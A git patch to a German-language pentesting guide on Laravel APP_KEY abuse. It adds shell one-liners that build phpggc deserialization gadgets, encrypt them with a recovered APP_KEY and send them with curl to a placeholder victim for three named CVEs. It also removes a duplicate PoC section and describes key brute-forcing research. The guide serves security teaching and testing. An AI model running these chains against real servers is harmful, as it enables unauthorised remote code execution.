From eb3739867d8beebe3332ceba05c15f2ac71c6c9f Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Mon, 4 Aug 2025 22:30:18 +0000
Subject: [PATCH] Translated
 ['src/network-services-pentesting/pentesting-web/laravel.md']

---
 .../pentesting-web/laravel.md                 | 136 +++++-------------
 1 file changed, 34 insertions(+), 102 deletions(-)

diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md
index 30da08733..5c0923938 100644
--- a/src/network-services-pentesting/pentesting-web/laravel.md
+++ b/src/network-services-pentesting/pentesting-web/laravel.md
@@ -11,7 +11,7 @@ Lesen Sie Informationen dazu hier: [https://stitcher.io/blog/unsafe-sql-function
 ## APP_KEY & Verschlüsselungsinternas (Laravel \u003e=5.6)
 
 Laravel verwendet AES-256-CBC (oder GCM) mit HMAC-Integrität im Hintergrund (`Illuminate\\Encryption\\Encrypter`).
-Der rohe Chiffretext, der schließlich **an den Client gesendet** wird, ist **Base64 eines JSON-Objekts** wie:
+Der rohe Chiffretext, der schließlich **an den Client** **gesendet wird**, ist **Base64 eines JSON-Objekts** wie:
 ```json
 {
 "iv"   : "Base64(random 16-byte IV)",
@@ -52,38 +52,48 @@ Das Skript unterstützt transparent sowohl CBC- als auch GCM-Payloads und regene
 ## Reale verwundbare Muster
 
 | Projekt | Verwundbare Senke | Gadget-Kette |
-|---------|-------------------|--------------|
+|---------|-------------------|---------------|
 | Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 |
 | Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` Cookie, wenn `Passport::withCookieSerialization()` aktiviert ist | Laravel/RCE9 |
 | Crater  (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` Cookie | Laravel/RCE15 |
 
 Der Exploit-Workflow ist immer:
-1. `APP_KEY` beschaffen (Standardbeispiele, Git-Leak, config/.env-Leak oder Brute-Force)
-2. Gadget mit **PHPGGC** generieren
-3. `laravel_crypto_killer.py encrypt …`
-4. Payload über den verwundbaren Parameter/Cookie liefern → **RCE**
+1. Erhalten oder Brute-Force des 32-Byte `APP_KEY`.
+2. Erstellen einer Gadget-Kette mit **PHPGGC** (zum Beispiel `Laravel/RCE13`, `Laravel/RCE9` oder `Laravel/RCE15`).
+3. Verschlüsseln des serialisierten Gadgets mit **laravel_crypto_killer.py** und dem wiederhergestellten `APP_KEY`.
+4. Übermitteln des Chiffretextes an die verwundbare `decrypt()`-Senke (Routenparameter, Cookie, Sitzung …), um **RCE** auszulösen.
 
+Unten sind prägnante Einzeiler, die den vollständigen Angriffsweg für jede oben genannte reale CVE demonstrieren:
+```bash
+# Invoice Ninja ≤5 – /route/{hash}
+php8.2 phpggc Laravel/RCE13 system id -b -f | \
+./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
+xargs -I% curl "https://victim/route/%"
+
+# Snipe-IT ≤6 – XSRF-TOKEN cookie
+php7.4 phpggc Laravel/RCE9 system id -b | \
+./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
+curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login
+
+# Crater – cookie-based session
+php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
+./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
+curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login
+```
 ---
 
-## Massenhafte APP_KEY-Entdeckung durch Cookie-Brute-Force
+## Mass APP_KEY Entdeckung über Cookie Brute-Force
 
-Da jede frische Laravel-Antwort mindestens 1 verschlüsseltes Cookie (`XSRF-TOKEN` und normalerweise `laravel_session`) setzt, **leaken öffentliche Internet-Scanner (Shodan, Censys, …) Millionen von Chiffretexten**, die offline angegriffen werden können.
+Da jede frische Laravel-Antwort mindestens 1 verschlüsseltes Cookie (`XSRF-TOKEN` und normalerweise `laravel_session`) setzt, **leaken öffentliche Internet-Scanner (Shodan, Censys, … Millionen von Chiffretexten**, die offline angegriffen werden können.
 
 Wichtige Ergebnisse der von Synacktiv veröffentlichten Forschung (2024-2025):
 * Datensatz Juli 2024 » 580 k Tokens, **3,99 % Schlüssel geknackt** (≈23 k)
 * Datensatz Mai 2025 » 625 k Tokens, **3,56 % Schlüssel geknackt**
-* >1 000 Server sind weiterhin anfällig für das Legacy-CVE-2018-15133, da Tokens direkt serialisierte Daten enthalten.
-* Hohe Schlüsselwiederverwendung – die Top-10 APP_KEYs sind hartkodierte Standardwerte, die mit kommerziellen Laravel-Vorlagen (UltimatePOS, Invoice Ninja, XPanel, …) ausgeliefert werden.
+* >1 000 Server sind weiterhin anfällig für das Legacy CVE-2018-15133, da Tokens direkt serialisierte Daten enthalten.
+* Hohe Schlüsselwiederverwendung – die Top-10 APP_KEYs sind hartcodierte Standardwerte, die mit kommerziellen Laravel-Vorlagen (UltimatePOS, Invoice Ninja, XPanel, …) ausgeliefert werden.
 
-Das private Go-Tool **nounours** erhöht die AES-CBC/GCM-Bruteforce-Durchsatzrate auf ~1,5 Milliarden Versuche/s, wodurch das Knacken des vollständigen Datensatzes auf <2 Minuten reduziert wird.
+Das private Go-Tool **nounours** erhöht die AES-CBC/GCM Brute-Force-Durchsatzrate auf ~1,5 Milliarden Versuche/s und reduziert das Knacken des vollständigen Datensatzes auf <2 Minuten.
 
----
-
-## Referenzen
-* [Laravel: APP_KEY-Leckanalyse](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
-* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
-* [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
-* [CVE-2018-15133 Write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
 
 ## Laravel Tricks
 
@@ -94,11 +104,11 @@ Zum Beispiel `http://127.0.0.1:8000/profiles`:
 
 ![](<../../images/image (1046).png>)
 
-Dies wird normalerweise benötigt, um andere Laravel RCE CVEs auszunutzen.
+Dies ist normalerweise erforderlich, um andere Laravel RCE CVEs auszunutzen.
 
 ### .env
 
-Laravel speichert den APP, den es zur Verschlüsselung der Cookies und anderer Anmeldeinformationen verwendet, in einer Datei namens `.env`, die über einige Pfadüberquerungen unter: `/../.env` zugänglich ist.
+Laravel speichert die APP, die es verwendet, um die Cookies und andere Anmeldeinformationen zu verschlüsseln, in einer Datei namens `.env`, die über einen Pfad-Traversal unter: `/../.env` zugänglich ist.
 
 Laravel zeigt diese Informationen auch auf der Debug-Seite an (die erscheint, wenn Laravel einen Fehler findet und aktiviert ist).
 
@@ -176,91 +186,13 @@ Oder Sie können es auch mit metasploit ausnutzen: `use unix/http/laravel_token_
 
 Eine weitere Deserialisierung: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
 
-### Laravel SQLInjection
 
-Lesen Sie Informationen darüber hier: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
 
-### Laravel SQLInjection
-
-Lesen Sie Informationen darüber hier: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
-
----
-
-## APP_KEY & Encryption internals (Laravel \u003e=5.6)
-
-Laravel verwendet AES-256-CBC (oder GCM) mit HMAC-Integrität im Hintergrund (`Illuminate\\Encryption\\Encrypter`).
-Der rohe Chiffretext, der schließlich **an den Client gesendet** wird, ist **Base64 eines JSON-Objekts** wie:
-```json
-{
-"iv"   : "Base64(random 16-byte IV)",
-"value": "Base64(ciphertext)",
-"mac"  : "HMAC_SHA256(iv||value, APP_KEY)",
-"tag"  : ""                 // only used for AEAD ciphers (GCM)
-}
-```
-`encrypt($value, $serialize=true)` wird standardmäßig `serialize()` den Klartext, während `decrypt($payload, $unserialize=true)` **automatisch `unserialize()`** den entschlüsselten Wert. Daher **kann jeder Angreifer, der den 32-Byte-Geheimschlüssel `APP_KEY` kennt, ein verschlüsseltes PHP-serialisiertes Objekt erstellen und RCE über magische Methoden (`__wakeup`, `__destruct`, …) erlangen**.
-
-Minimal PoC (Framework ≥9.x):
-```php
-use Illuminate\Support\Facades\Crypt;
-
-$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
-$evil  = Crypt::encrypt($chain);            // JSON->Base64 cipher ready to paste
-```
-Injiziere den erzeugten String in jede verwundbare `decrypt()` Senke (Routenparameter, Cookie, Sitzung, …).
-
----
-
-## laravel-crypto-killer 🧨
-[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automatisiert den gesamten Prozess und fügt einen praktischen **bruteforce** Modus hinzu:
-```bash
-# Encrypt a phpggc chain with a known APP_KEY
-laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
-
-# Decrypt a captured cookie / token
-laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
-
-# Try a word-list of keys against a token (offline)
-laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
-```
-Das Skript unterstützt transparent sowohl CBC- als auch GCM-Payloads und regeneriert das HMAC/Tag-Feld.
-
----
-
-## Verwundbare Muster in der realen Welt
-
-| Projekt | Verwundbare Senke | Gadget-Kette |
-|---------|-------------------|--------------|
-| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}` → `decrypt($hash)` | Laravel/RCE13 |
-| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` Cookie, wenn `Passport::withCookieSerialization()` aktiviert ist | Laravel/RCE9 |
-| Crater  (CVE-2024-55556) | `SESSION_DRIVER=cookie` → `laravel_session` Cookie | Laravel/RCE15 |
-
-Der Exploit-Workflow ist immer:
-1. `APP_KEY` beschaffen (Standardbeispiele, Git-Leak, config/.env-Leak oder Brute-Force)
-2. Gadget mit **PHPGGC** generieren
-3. `laravel_crypto_killer.py encrypt …`
-4. Payload über den verwundbaren Parameter/Cookie liefern → **RCE**
-
----
-
-## Massenhafte APP_KEY-Entdeckung durch Cookie-Brute-Force
-
-Da jede frische Laravel-Antwort mindestens 1 verschlüsseltes Cookie (`XSRF-TOKEN` und normalerweise `laravel_session`) setzt, **leaken öffentliche Internet-Scanner (Shodan, Censys, …) Millionen von Chiffretexten**, die offline angegriffen werden können.
-
-Wichtige Ergebnisse der von Synacktiv veröffentlichten Forschung (2024-2025):
-* Datensatz Juli 2024 » 580 k Tokens, **3,99 % Schlüssel geknackt** (≈23 k)
-* Datensatz Mai 2025 » 625 k Tokens, **3,56 % Schlüssel geknackt**
-* >1 000 Server sind weiterhin anfällig für das Legacy-CVE-2018-15133, da Tokens direkt serialisierte Daten enthalten.
-* Hohe Schlüsselwiederverwendung – die Top-10 APP_KEYs sind fest codierte Standardwerte, die mit kommerziellen Laravel-Vorlagen (UltimatePOS, Invoice Ninja, XPanel, …) ausgeliefert werden.
-
-Das private Go-Tool **nounours** erhöht die AES-CBC/GCM-Bruteforce-Durchsatzrate auf ~1,5 Milliarden Versuche/s und reduziert das Knacken des vollständigen Datensatzes auf <2 Minuten.
-
----
-
-## Referenzen
-* [Laravel: APP_KEY-Leckanalyse](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
+## References
+* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
+* [Laravel : analyse de fuite d’APP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
 * [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
 * [PHPGGC – PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
-* [CVE-2018-15133 Write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
+* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
 
 {{#include ../../banners/hacktricks-training.md}}